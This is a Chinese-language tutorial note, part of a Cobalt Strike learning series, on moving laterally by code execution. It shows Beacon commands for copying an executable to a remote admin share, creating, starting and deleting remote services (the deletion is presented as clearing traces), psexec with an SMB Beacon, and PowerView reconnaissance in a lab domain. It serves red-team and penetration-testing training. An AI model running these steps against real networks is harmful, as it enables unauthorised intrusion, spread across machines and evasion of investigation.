1. 极安网首页
  2. 网络安全教程

CobaltStrike视频学习笔记系列:(十九)代码执行的方式

CobaltStrike视频学习笔记系列:(十九)代码执行的方式-极安网

0x00 前言

实现代码执行的四个步骤:

1、与目标建立信任关系

2、复制可执行文件到目标上

3、在目标上运行可执行文件

4、实现对目标的控制

以上是根据视频教程中直译的结果,个人感觉其实这一节叫横向移动的方法更为合适。

0x01 创建可执行文件

创建可执行文件可以在 Cobalt Strike 的 Attack -> Packages -> Windows Executable(s) 处进行创建。

CobaltStrike视频学习笔记系列:(十九)代码执行的方式-极安网

如果用于内网中的横向移动,那么强烈建议使用 SMB Beacon,SMB Beacon 就是为了内网横向扩展渗透而设计的。

0x02 上传可执行文件

首先使用 Cobalt Strike 上的 upload 功能上传文件,接着复制文件到目标主机的其他位置。

  1. shell copy file.exe \\host\C$\Windows\Temp

0x03 执行文件

1、生成 Windows Service EXE 并上传

2、在目标主机上创建一个服务

  1. shell sc \\host create name binpath= c:\windows\temp\file.exe

3、在目标主机上启动服务

  1. shell sc \\host start name

4、清除痕迹与服务

  1. shell sc \\host delete name

0x04 自动操作

前面说的两种执行文件的方法都需要往磁盘里上传文件,如果不想往磁盘中上传文件,也可以使用 beacon 的自动操作。

使用一个服务运行可执行文件

  1. psexec [target] [share] [listener]

在 Cobalt Strike 的 viwe --> Targets 下,右击主机选择 Jump 也可以通过图形化的方式进行上述操作,这样也使得横向移动更加的简单。

接下来进行一下演示,目前手中有一个普通机器的管理员会话,我们先在这台机器上运行 net view 查看一下当前域环境中的主机信息。

  1. beacon> net view

因为是自己本地搭建的测试环境,所以主机很少,可以看到当前域中有两台机器,再利用 PowerView 查找一下具有本地管理员访问权限的用户

  1. beacon> powershell-import PowerView.ps1

接下来在 WinDC 上运行 psexec,因为这里是 64 位的,所以选择 psexec64,之后监听选择一个 smb beacon,会话就选择已经上线的 wintest 主机的会话,并勾选使用当前会话的访问令牌。

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/1987.html